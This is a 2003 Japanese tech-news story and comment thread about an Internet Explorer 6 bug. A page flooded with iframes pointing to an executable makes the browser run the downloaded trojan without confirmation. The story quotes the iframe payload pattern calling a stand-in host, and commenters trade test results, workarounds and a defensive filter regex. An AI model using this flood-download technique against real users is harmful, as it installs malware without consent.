パスワードを忘れた? アカウント作成
5722 story

ブラクラ状態の後にダウンロードプログラムを強制実行するIE 6 174

ストーリー by Oliver
げっぷ 部門より

jbeef曰く、"5月16日のセキュリティホールmemoでもとりあげられているように、IE 6にバグがあり、<iframe src="http://example.com/trojan.exe">などが無数に書かれたHTMLページにアクセスすると、ダウンロードした trojan.exe が確認なしに起動してしまうという。Nimda級のワームに悪用されるおそれがあり危険だ。
実際に試してみたところ、最初は「ファイルのダウンロード」確認ウィンドウが現れて「開く」「保存」「キャンセル」を選択させられるが、これが大量に開いて、いわゆるブラクラ状態となる。ここで急いでWindowsのタスクマネージャを開いてプロセスを終了させようとしても、間に合わず、ついにはなぜか、ダウンロードしたプログラムが起動してしまった。
回避方法として、ブラクラ状態になったら即座にネットワークケーブルを外すことが有効のように見えた。ダウンロードがそれ以上進まなくなるからだ。ただしそれで常に避けられるかはわからない。
根本的な解決のためには、そもそも大量のウィンドウが現れること自体を防ぐべきではなかろうか。同時処理数に上限を設けないことは、ある意味美しい設計ではある(組み込み機器にありがちな上限固定設計に比べて)のだが、ブラクラを防ぐために上限を設けるのはどうだろうか。"

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • ほかにも… (スコア:5, 興味深い)

    by minz (3213) on 2003年05月19日 5時43分 (#318673) ホームページ 日記
    > ブラクラを防ぐために上限を設けるのはどうだろうか。
    同感なんですが、根本的なハナシ、

    この動作が、大量処理を強要した結果、ダイアログの応答を誤認して、ある意味正常にダウンロード対象を保存し実行まで処理を継続してしまうのなら、ブラクラ攻撃以外にも大きな脆弱性が存在したりしませんかね?

    IEにとどまらず、もしかしたらダイアログAPI、果てはウインドウ管理そのもの、の問題かも…。ダイアログを大量に出すように任意のアプリケーションを誘導できさえすれば、誤動作に導けそうな気がしてしまいます。
    --
    みんつ
    • Re:ほかにも… (スコア:3, 参考になる)

      by Ying (4319) on 2003年05月19日 8時30分 (#318711)
      モーダルなダイアログボックスを表示するWin32 API、DialogBox()は成功時にはそのダイアログの終了時に呼ばれたEndDialog()の引数nResultの値を、失敗時には-1を返します。

      で、失敗時の-1を"開く"を選択したと誤認すると……

      いや、今回のこれがそうだとは思いませんが。

      親コメント
    • Re:ほかにも… (スコア:2, 参考になる)

      by Y.. (7829) on 2003年05月19日 11時20分 (#318776) 日記
      これって ユーザーの応答を待ってる間に裏でダウンロード始めてて、裏でダウンロード終わったらユーザーの反応を見ないでiframeで開いちゃうってバグだと思ってたんですが

      たぶん ダイアログの応答誤認ってのは違うと思う
      親コメント
  • by Anonymous Coward on 2003年05月19日 7時35分 (#318693)
    Irvine [vector.co.jp]でIEの拡張子監視をして、特定の拡張子のURLをダウンロードキューにぶち込むような設定にしてる場合は回避可能ですかねぇ?
    この機能を利用してると、Irvineが立ち上がってなくてもIEのダウンロードダイアログが完全に殺される(=代わりにIrvineが立ち上がってキューにURLを入れる)んですが。

    # これ、ときどき.exe形式のカウンターが引っかかったりしますが:(
    # エロサイトだとdial.exeみたいなのがキューに入れられたりも。
  • by shiraga (14233) on 2003年05月19日 5時53分 (#318675)
    「セキュリティMEMO」に紹介されているサンプルページ(IEの方は注意) [malware.com]に行ってみました。(OSはRedhat7.3。)

    ファイルを保存するか問うダイアログが一度出て、「キャンセル」するとそれっきりでした。

    ただ、WindowにはJPEGファイルが破損したような画像が表示されました。
    不思議なのは、リロードする度にこの画像が違うこと(画像サイズは同じ)。
    何をしようとしたんでしょう? >火の鳥さん
    • by shunsuke (1586) on 2003年05月19日 11時38分 (#318786) ホームページ 日記
      なんと、Mac OS X(10.2)とIE5.2.2の組み合わせで、行ってみたら、無限ダウンロードが開始されてしまいました。

       Mac版のIEとWin版のIEって、中身は全く別物かと思ってたんですけど、こういうこともあるんですね。

       というわけで、Macユーザーも警戒して下さい。

      # これを機会に、完全にSafariに乗り換えるのもいいかも
      親コメント
    • by Y.. (7829) on 2003年05月19日 8時10分 (#318702) 日記
      同じく ファイル保存を問うダイアログが一度出て、「キャンセル」するとそれっきりでした。
      表示も真っ白のままです

      ただし、キャンセルしないで放置してあげるとOperaさんが無反応に…

      微妙に危険かもしれず…
      親コメント
    • いきなり fooware.exe が1回ダウンロードされてそれっきり。でも、いきなり何の確認もなしにダウンロードされちゃうのはいやだなぁ...

      親コメント
    • by shiraga (14233) on 2003年05月19日 21時03分 (#319132)
      何も聞かずにダウンロードしちゃうんだよね、これが。
      「ブラウザが表示できないファイルの処理」をユーザーが設定出来るようにして欲しいな。

      #Feedbackに送る文章考えよ…。
      親コメント
  • by Anonymous Coward on 2003年05月19日 6時54分 (#318680)
    簡単でしかも効果的な方法を容易く公開していいのでしょうか?
    これじゃや「やってくれ」と言わんばかり…

    回避方法って...
    これ回避方法とは呼べないでしょう。
    LANコードなんてそう簡単に抜けないと思うし
    正直リセットの方が効果的だと思う。
    それを承知なら使う方が間違っているという結論になりますが…

    #タブPCにCtrl+Alt+Delキーなる便利なキーがあったなー(遠い目)
    • 回避方法 (スコア:1, すばらしい洞察)

      by Anonymous Coward on 2003年05月19日 8時40分 (#318715)
      回避方法って WinIE とそのコンポーネントをつかった Web ブラウザを当分の間使わないだけでいいんじゃない?
      親コメント
  • by Anonymous Coward on 2003年05月19日 11時48分 (#318788)
    セキュリティーに厳しい人はMSIE使わないので
    このような脆弱性が発見されても平気で…
    そうではない人はセキュリティーに無頓着なので
    このような脆弱性が発見されても平気で
    例えばいまだにMS01-020のパッチすら当たっていない人もいるくらいでして…
    結局
    MSIEは今まで深刻な脆弱性をいくつも発見されていますが
    普及しているにも関わらず他のソフトの脆弱性発見に比べて
    騒がれないものです。

    企業によってはMSIEの使用を禁止しているようですが、許可しているところでも
    オフィス内のヘビーユーザーはMozillaユーザーだったりします。
    MSIEの脆弱性が発見されてもMSIEを使わないヘビーユーザーは
    対岸の火事のような感覚で受け止めるため、
    自分には関係がないということで情報を集めず、
    オフィスに警鐘を鳴らすこともなく、何の動きもなく月日が経過しがちです。
    そして忘れたころに脆弱性を突くウィルスが登場して
    オフィスが一気に汚染されてしまうパターン。

    MSIEのバグで深刻なのは、その個々のバグの内容よりも、
    何が起きても放置されがちな背景にあると思われます。
    IEやOEに対するパッチが出たあと長期間パッチを当てずに放置した人が
    沢山いたために流行した事例はKlezやFrethemなど沢山あります。
    「なぜ今ごろこんな古い脆弱性を突くウィルスが?」
    という問題は今の状況が変わらない限りこれからも続くでしょう。

    日本のオフィス内でMSIEが脆弱になってしまう大きな原因に
    「最初から入っている」
    という点があるでしょう。

    Mozilla, Operaのような後からインストールされるツールは
    ユーザーが自分の意思と自分の作業でインストールするため、
    そこにセキュリティーホールがあると入れた自分の責任になってしまいます。
    そのため、インストールしたあとセキュリティー情報に興味を持ちやすくなり、
    また自分の手間で入れたために愛着もわくことになり、
    そういう理由から自然に安全性は向上します。

    しかしMSIEのように「最初から入っている」「自分が入れたのではない」となると、
    脆弱性によって何が起きても自分の責任ではないということで、
    それどころか下手にパッチを当てて問題が起きたら自分の責任になるということで、
    事なかれ主義の日本人サラリーマンは
    パッチを当てず「そのまま」の状態で放置することが当り前になります。
    コンピューター技術を売りとしていないオフィスや
    忙しいオフィスではそれが顕著です。
    「何も行動を起こさないのは何よりも悪い」という文化の地域もあるようですが
    大抵の日本人には受け入れられず、
    「私がやったのではないので責任はない」というエクスキューズがあると
    日本人はすぐそちらに飛びつきます。
    そういったことから、パッチなしMSIEが大量に潜んでおり、
    アンチウィルスソフトがそれを誤魔化している、というのが今の日本のオフィスです。

    「原則禁止。使いたい場合は、手抜きして既に入っているものを使うのではなく
    新しくダウンロードし、継続的に新しいパッチを追いかける」
    などと条件をつけない限り、
    オフィス内でMSIEを使用することに安全性はないと思われます。
    • これについてはシステム開発者にも問題があるような気がします。最近はやりのWEBを利用したアプリケーション開発(特に社内に特化したもの)時、テスト工数当お金の問題もあり対象となるブラウザを固定してしまう事があります。
      やはりこういった場合、導入コストを考えてI初期導入済みのMSブラウザを対象としてしまっているのが現状です。(下手をするとパッチレベルまで指定する事もあるようです。)
      これに伴い、個人的に利用しているブラウザでは社内システムが動かないなどの弊害によりMSブラウザに依存せざる得ない方も多いのではと思いますが。。。
      本来であれば、そういったセキュリティレベルまで考慮したシステム開発が必要なのでしょうが納期や費用の問題もあり現状でとりあえずMSブラウザでOKとしてしまっている部分も多いです。

      まぁ、本来は自分の身を守るという意味で、インターネット接続と社内システムでブラウザを変更すれば問題ないのでしょうが。。。
      セキュリティに詳しい人がどの程度社内にいるかの問題と、セキュリティ問題に対する啓蒙(社内的なもの)がどの程度行うことができるかという問題もあると思われます。(コストの面も大きいですが。。)

      ただこの話も、開発する側の問題なのかもしれませんが。。
      --
      bamb_t
      親コメント
    • >「原則禁止。使いたい場合は、手抜きして既に入っているものを使うのではなく
      >新しくダウンロードし、継続的に新しいパッチを追いかける」
      >などと条件をつけない限り、
      >オフィス内でMSIEを使用することに安全性はないと思われます。

      MSIEに限った話じゃないんじゃない?
      それにWindowsを使用しているならば、たとえWebブラウザとして何を使用していようが問題となる可能性があるので、それで対岸の火事のように感じてしまうヘビーユーザーとやらも問題でしょう。

      コンピュータを使うならば、程度の差こそあれパッチ情報に目を光らおく必要はあるでしょう。
      IE以外のブラウザの方がセキュリティ脆弱性が起こりにくい構造にあるとか、セキュリティ更新がすばやく行われるとか、パッチ適用が簡単であるとか、そういう理由でMozilla等を推奨するならともかく単に追加でインストールしたものだからパッチ適用も行うだろうというようなあいまいな理由で推奨するのはユーザーにとっても管理者にとっても不幸なことだと思いますがいかがでしょうか。
      親コメント
    • パッチを当てて不具合が出るリスクを回避しているとも言えるような…。
      結局MSIEのパッチをを当てるのも自己責任なわけで。
      親コメント
  • by Anonymous Coward on 2003年05月19日 7時26分 (#318690)
    >回避方法として、ブラクラ状態になったら即座にネットワークケーブルを外すことが有効のように見えた。

    これ、内蔵無線LANの場合はどうしたら良いんでしょう?

    まぁ、タブブラウザソフトでタブ数の上限をかけても良いんでしょうけど。
    • by Joga (8113) on 2003年05月19日 7時37分 (#318694)
      > >回避方法として、ブラクラ状態になったら即座にネットワークケーブルを外すことが有効のように見えた。
      >
      > これ、内蔵無線LANの場合はどうしたら良いんでしょう?

      んと、Win2K,XPなら、即座にCtrl+Alt+Delからタスクマネージャーを起動して、IEを殺すのが有効っぽい。
      #うちのPCでは間に合った。 <つか、やるなw

      まあ、そのままシャットダウンしたほうが良いかな?

      > まぁ、タブブラウザソフトでタブ数の上限をかけても良いんでしょうけど。

      これ、だめぽ。
      あれはJavaScriptで開かれるウィンドウに対してのみ有効みたいで、
      ダイアログみたいなのはタブにならないからだめみたい。
      (少なくとも、Sleipnirではだめだった)
      親コメント
      • by swat (10957) on 2003年05月19日 10時31分 (#318759)
        >Ctrl+Alt+Delからタスクマネージャーを起動して

        参考までに、Ctrl+Shift+Esc で直接タスクマネージャを
        起動できます。
        親コメント
        • いつも思うんですが、Win2000ではCtrl+Alt+Delを押したときに全アプリが止まってくれているような感じがするのですが、タスクマネージャを起動したとたんに元の画面に戻ってふたたび動き出すのはどうなのかと思います。排他的状況でタスクマネージャを操作できるようにしてほしいものです。

          なお、WinXPでの新しいログオン機構が動いてるときだと思うのですが、Ctrl+Shift+EscでなくてもCtrl+Alt+Delで直接タスクマネージャが起動します。

          #さっきダウンロードしたMozillaFirebirdが早速役に立ってウマー
          親コメント
    • by Anonymous Coward on 2003年05月19日 7時28分 (#318692)
      白い布をかければいい、ってTVで言っていたよ。
      親コメント
    • by Anonymous Coward on 2003年05月19日 10時05分 (#318750)
      > 内蔵無線LANの場合はどうしたら良いんでしょう?

      ソニーのノートPCだと、無線LANをON/OFFする物理スイッチがついてて
      便利ですよ。
      http://review.japan.cnet.com/pub/column/sutapa/200304.html
      親コメント
      • >> 内蔵無線LANの場合はどうしたら良いんでしょう?
        >ソニーのノートPCだと

        ソニーのノートPCに限らず…
        Libretto [dynabook.com]なんかでもできます。

        ってか、ふつ~付いているもんだと思うんだけど…他の会社のって、ついてないの?
        --

        ----------------------------------------
        You can't always get what you want...
        親コメント
      • 付いてます. おかげで, 飛行機中電子機器使用可能時間帯はDVDみてます. そ~です. 機内でLOOXをポータブルDVDプレーヤ代わりにミスタービーンをみているのは私です. (家の中では, レッドドワーフをみている)
        --
        ★田舎に生息する時代遅れのFortran&COBOLガイなオタク★
        親コメント
    • by Anonymous Coward on 2003年05月19日 15時42分 (#318923)
      >これ、内蔵無線LANの場合はどうしたら良いんでしょう?

      1. 手元にグルカナイフを用意します。
      2. アクセスポイントに向けて思い切り投げつけます
      3. ネットワークが切断したら成功です。

      すばやい対応と日頃の鍛錬が重要です。
      親コメント
  • by Anonymous Coward on 2003年05月19日 8時07分 (#318700)
    ホップアップウインドウとかダウンロードダイアログとかいっぱい開きつづけたら、
    「ウインドウの数が設定数を超えました。処理を続行しますか?」
    みたいに聞いてきてくれればありがたいなぁ。
    タブブラウザの窓数抑止は、エ○画像を大量に開きまくってたらすぐ超えるから設定してないし…
    • Re:こうすればいいのに (スコア:2, すばらしい洞察)

      by Anonymous Coward on 2003年05月19日 8時47分 (#318716)
      そして今度は
      「ウインドウの数が設定数を超えました。処理を続行しますか?」
      と質問するダイアログの数が上限を超えて誤動作するのですよ。多分。
      親コメント
    • by Anonymous Coward on 2003年05月19日 8時59分 (#318720)
      単位時間あたりに開く窓数を制限すれば、ふつうの用法だとひっかからないと思う。

      たとえば、1秒に1枚までとか、10秒に10枚までとか(後者は、0.001秒のあいだに10枚開いたらあと9.999秒は新たな窓を開けないという意味)。そうすれば、ブラクラに遭遇してもゆっくり対処できる。

      親コメント
  • 私のパソコンは遅いので、1つのダイアログが表示されるのに5秒くらいかかるから、カンタンにCtrl+Alt+Delでブラウザを殺せてしまいます。
    嬉しいような、悲しいような・・・。
  • by shadowfire (6584) on 2003年05月19日 10時52分 (#318764) ホームページ
    誰かProxomitronでこれ回避するパターンデータ作ってないですか?
    作ってたら教えてくだされ~。

    # 「iFrame/iLayer to link」で効くかと思ったが駄目だった...
     
    --
    --------------------
    /* SHADOWFIRE */
    • Re:おふとぴ (スコア:3, 参考になる)

      by miri (12057) on 2003年05月19日 12時33分 (#318816) 日記
      「iFrame/iLayer to link」は閉じタグ</iframe>を要求するのでマッチしないみたいです。

      「範囲のマッチ (Bounds)」のところを
      <i(frame|layer)\s*>(</i(frame|layer)>|)
      に変更するといけました。お試しください。

      試すときはキャッシュを削除した方がいいかも。
      親コメント
      • >> 「範囲のマッチ (Bounds)」のところを
        >> <i(frame|layer)\s*>(</i(frame|layer)>|)
        >> に変更するといけました。お試しください。

        おー、うまくいきました。
        有難うございます。

        >> 試すときはキャッシュを削除した方がいいかも。

        そう!その通り。
        ワタシは、削除せずにやって、またくらってしまいました...
         
        --
        --------------------
        /* SHADOWFIRE */
        親コメント
  • 判らない用語 (スコア:1, すばらしい洞察)

    by Anonymous Coward on 2003年05月19日 14時40分 (#318889)
    「ブラクラ状態」って何でしょうか?
    一般的な用語なのかな。

    #はづかすぃのでAC
typodupeerror

皆さんもソースを読むときに、行と行の間を読むような気持ちで見てほしい -- あるハッカー

読み込み中...